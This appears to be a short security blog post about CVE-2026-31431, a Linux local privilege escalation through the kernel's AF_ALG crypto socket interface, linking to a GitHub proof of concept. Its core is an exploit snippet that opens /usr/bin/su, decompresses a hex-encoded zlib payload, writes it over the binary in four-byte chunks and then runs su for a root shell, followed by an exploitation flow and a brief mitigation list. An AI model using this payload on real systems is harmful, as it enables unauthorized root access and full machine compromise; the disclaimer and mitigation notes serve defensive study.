Linux Privilege Escalation | AF_ALG Crypto Abuse β Exploiting AEAD socket handling (CVE-2026β31431) to gain root via kernel-level manipulation
π§ Overview
CVE-2026β31431 is a Linux privilege escalation vulnerability that abuses the AF_ALG (kernel crypto API) interface. By crafting a malicious interaction with AEAD (Authenticated Encryption with Associated Data) sockets, an attacker can escalate privileges and execute code as root.
This vulnerability leverages improper handling of cryptographic socket operations, allowing controlled memory manipulation and eventual privilege escalation.
β οΈ Impact
- Local Privilege Escalation
- Root shell access (
/usr/bin/su) - Affects systems with vulnerable kernel crypto implementations
π Technical Breakdown
The exploit:
- Creates an AF_ALG socket
- Binds to:
authenc(hmac(sha256),cbc(aes))- Uses crafted payloads via
setsockoptandsendmsg - Triggers unintended kernel behavior
- Drops into root shell via:
g.system("su")Key indicators:
- Use of
socket(38,5,0)β AF_ALG - AEAD manipulation
- Controlled memory writes via compressed payload (
zlib)
π» Proof of Concept (PoC)
Also, available on My GitHub now: https://github.com/AdityaBhatt3010/CVE-2026-31431/
π Core Payload Snippet:
Disclaimer: I do not own this PoC. It's Only for Educational purposes for testing in environments where the permission is available. The Author/ owner will not be reponsible for any misuse.
f=g.open("/usr/bin/su",0)
i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):
c(f,i,e[i:i+4])
i+=4
g.system("su")π Exploitation Flow
- Initialize crypto socket
- Configure AEAD parameters
- Send crafted payload
- Trigger kernel flaw
- Overwrite execution flow
- Spawn root shell
π‘οΈ Mitigation
- Patch kernel to latest version
- Restrict access to AF_ALG sockets
- Use LSM (AppArmor/SELinux) policies
- Monitor abnormal crypto API usage